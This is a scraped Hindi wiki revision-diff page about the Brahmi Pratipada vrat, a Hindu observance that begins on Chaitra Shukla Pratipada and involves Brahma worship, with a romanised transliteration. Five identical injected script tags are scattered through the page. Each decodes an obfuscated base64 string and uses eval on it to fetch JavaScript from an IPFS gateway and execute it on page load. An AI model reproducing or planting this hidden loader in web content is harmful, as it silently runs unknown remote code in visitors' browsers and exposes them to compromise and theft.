Difference between revisions of "ब्राह्मीप्रतिपद लाभ व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[चैत्र]] [[शुक्ल पक्ष|शुक्ल]] [[प्रतिपदा]] से आरम्भ किया जाता है।  
 
*[[चैत्र]] [[शुक्ल पक्ष|शुक्ल]] [[प्रतिपदा]] से आरम्भ किया जाता है।  
*उपवास; रंगीन चूर्णों से अष्ट दल [[कमल]] का निर्माण करके; बीज कोष पर [[ब्रह्मा]] प्रतिमा का पूजन किया जाता है।  
+
*उपवास रखा जाता है।
 +
*रंगीन चूर्णों से अष्ट दल [[कमल]] का निर्माण करके; बीज कोष पर [[ब्रह्मा]] प्रतिमा का पूजन किया जाता है।  
 
*चारों दिशाओं में पूर्व से आरम्भ कर क्रम से [[ऋग्वेद]], [[यजुर्वेद]] एवं [[अथर्वेवेद]] की प्रतिमाएँ; दक्षिण-पूर्व कोण से आरम्भ कर क्रम से अंगों का पूजन किया जाता है।  
 
*चारों दिशाओं में पूर्व से आरम्भ कर क्रम से [[ऋग्वेद]], [[यजुर्वेद]] एवं [[अथर्वेवेद]] की प्रतिमाएँ; दक्षिण-पूर्व कोण से आरम्भ कर क्रम से अंगों का पूजन किया जाता है।  
 
*धर्मशास्त्रों, [[पुराण|पुराणों]] एवं न्यायविस्तर को रखा जाता है।  
 
*धर्मशास्त्रों, [[पुराण|पुराणों]] एवं न्यायविस्तर को रखा जाता है।  
 
*एक [[वर्ष]] तक प्रत्येक [[मास]] की प्रथम तिथि से पूजा का आरम्भ और अन्त में गोदान किया जाता है।  
 
*एक [[वर्ष]] तक प्रत्येक [[मास]] की प्रथम तिथि से पूजा का आरम्भ और अन्त में गोदान किया जाता है।  
*ऐसी मान्यता है कि इस व्रत से कर्ता वेदज्ञ हो जाता है और बारह वर्षों में ब्रह्मलोक पहुँच जाता है <ref>विष्णु धर्मोत्तपुराण (3|126|1-12)</ref>; <ref>हेमाद्रि (व्रत0 1, 343)</ref>
+
*ऐसी मान्यता है कि इस व्रत से कर्ता वेदज्ञ हो जाता है और बारह वर्षों में [[ब्रह्म लोक]] पहुँच जाता है।<ref>विष्णु धर्मोत्तपुराण (3|126|1-12)</ref>; <ref>हेमाद्रि (व्रतखण्ड 1, 343)</ref>
 +
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=आधार1
 
|आधार=आधार1

Revision as of 06:30, 10 September 2010

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullakhit hindoo dharm ka ek vrat sanskar hai.
  • chaitr shukl pratipada se arambh kiya jata hai.
  • upavas rakha jata hai.
  • rangin choornoan se asht dal kamal ka nirman karake; bij kosh par brahma pratima ka poojan kiya jata hai.
  • charoan dishaoan mean poorv se arambh kar kram se rrigved, yajurved evan atharveved ki pratimaean; dakshin-poorv kon se arambh kar kram se aangoan ka poojan kiya jata hai.
  • dharmashastroan, puranoan evan nyayavistar ko rakha jata hai.
  • ek varsh tak pratyek mas ki pratham tithi se pooja ka arambh aur ant mean godan kiya jata hai.
  • aisi manyata hai ki is vrat se karta vedajn ho jata hai aur barah varshoan mean brahm lok pahuanch jata hai.[1]; [2]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. vishnu dharmottapuran (3|126|1-12)
  2. hemadri (vratakhand 1, 343)

sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>